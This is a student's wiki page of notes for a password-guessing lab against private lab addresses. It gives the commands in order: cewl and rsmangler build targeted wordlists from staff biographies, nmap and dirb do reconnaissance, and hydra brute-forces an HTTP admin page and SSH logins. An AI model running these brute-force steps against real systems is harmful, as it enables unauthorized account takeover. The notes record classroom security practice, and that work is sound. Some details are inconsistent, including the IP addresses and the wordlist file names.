Lab 5.1 Password Guessing - zacharylongo/Tech-Journals GitHub Wiki
Lab 5.1: Password Guessing
Notes
First step was to nslookup my taget
nslookup 10.0.5.21 10.0.5.22
Then I used cewl to craw each biography to generate a wordlist.
sudo cewl -d 1 http://10.0.5.21/bios/{Insert member here} | grep '^[A-Z]' >> {Insert member here}_long.txt
- After this I used rsmangler to mangle the short wordlist.
`rsmangler --file {Insert member here}_short.txt -x 12 -m 9 -l -s -e -i -p -u -a --output {MEMBER}_mangled.txt
As a note,
- -x = max word length
- -m = minimum word length
- -l = lowercase word
- -s = uppercase word
- -e = add “ed” to the end of the word
- -i = add “ing: to the end of the word
- -p = permatate all of the words
- -u = uppercase word
- -a = create an acronym based on all the neted words in order and add that word to the list
- –file = input file
- –output = file to output
I then used nmap to gather the top 100 ports and their respective services/version.
sudo nmap -top-ports 100 10.0.6.21
I'd then use dirb to view hidden pages.
- `sudo dirb http://10.0.5.21/ -r
Noting the locked admin page on the site, i'd then use my mangled password lists to brute force a match.
sudo hydra -l {Insert member here} -P {Insert member here}_mangled.txt -s 80 -f 10.0.5.21 http-get "/admin"
After this successfully worked, I noted that SSH was open.
To find the passwords associated I used the following hydra command.
sudo hydra -l {Insert User first name here}.{Insert User last name here} -P {Insert member here}_mangled.txt 10.0.5.21 -t 4 ssh
This should get you the required results.